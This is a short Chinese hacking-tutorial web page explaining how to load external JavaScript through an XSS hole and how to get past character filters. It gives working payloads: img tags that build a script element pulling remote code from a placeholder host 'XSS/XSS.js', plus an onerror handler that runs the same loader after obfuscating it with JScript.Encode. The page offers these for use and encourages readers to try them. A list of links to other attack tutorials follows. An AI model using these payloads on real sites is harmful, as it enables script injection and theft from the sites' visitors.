手机
当前位置:查字典教程网 >网络安全 >黑客教程 >教你如何在XSS中再插JS
教你如何在XSS中再插JS
摘要:字符过滤怎么办?用Encode加密后就无敌了~未加密前:加密后:嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一...

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前:

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 加密后:

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

【教你如何在XSS中再插JS】相关文章:

教你学会Cookie与联合查询的注入

十一个步骤让你了解黑客是如何一步步攻击我们的 防御措施

教你成为ASP木马高手

教你如何使用Google黑掉Windows服务器

教你黑客侦察和隐藏IP地址的方法

教你如何破别人的ASP木马密码

教你数据库挂马

全面剖析DDoS攻击 黑客常用攻击方式

如何让进程在Linux后台运行

如何多开QQ游戏大厅

精品推荐
分类导航